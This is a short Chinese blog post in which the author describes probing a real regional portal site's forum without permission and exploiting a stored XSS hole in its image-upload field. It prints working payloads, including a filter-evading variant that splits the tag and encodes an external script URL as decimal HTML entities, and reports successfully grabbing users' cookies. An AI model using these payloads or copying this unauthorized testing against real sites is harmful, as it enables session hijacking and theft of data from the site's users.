作者：黑鸟 
   今天闲着无聊去网上逛了逛，忽然想起以前女朋友说过玲珑网开了很大，忽然想检测一下安全性怎样。百度找了一下：
柳州最大最火的综合性门户网。。靠，你这样写让我们做门户的情何以堪，决定教训一下。
 
   最近一直在关注着XSS的内容，决定还是看下是否存在XSS漏洞吧。
 
   论坛去注册一下用户去看看，发现一个图片网络上传的地方：
试试:http://”><script>alert(‘a’)</script.>结果：擦擦擦，没关系，继续找张网络图片OK，发布成功
嘿嘿，查看元素
Img标记和src属性如果没经过好的过滤很容易出现XSS。我们抓包试试”> 源码侧漏了。再试试”><script>alert(‘a’)</script.>

弹框了，为什么标题会变成乱码我也不知道为什么。。。。试试外部调用js
<p><a href=http://up.2cto.com/2013/0106/20130106112109502.png" target="_blank"><img src="http://bbs.300p.com/static/image/ss/logo."><script src="http://www.gxmhw.net/anying/test.js"></script>png" width="10" height="10"></a></p>
忽然发现。。。
没事，阻止不了我们前进的道路，我想也许是针对外链进行禁止吧。我们改下语句：<p><a href="http:// www.2cto.com /static/image/ss/logo.png" target="_blank"><img src="http://bbs.300p.com/static/image/ss/logo."><script src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#103;&#120;&#109;&#104;&#119;&#46;&#110;&#101;&#116;&#47;&#97;&#110;&#121;&#105;&#110;&#103;&#47;&#116;&#101;&#115;&#116;&#46;&#106;&#115;"></script>png" <script=""></a></p>
仔细的人应该看得出
"><script src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#103;&#120;&#109;&#104;&#119;&#46;&#110;&#101;&#116;&#47;&#97;&#110;&#121;&#105;&#110;&#103;&#47;&#116;&#101;&#115;&#116;&#46;&#106;&#115;"></script>png"
我们进行了分段，然后将外链用10进制加密。成功插入日记当中
嘿嘿，我们看看是否获得到了cookie值：

成功获取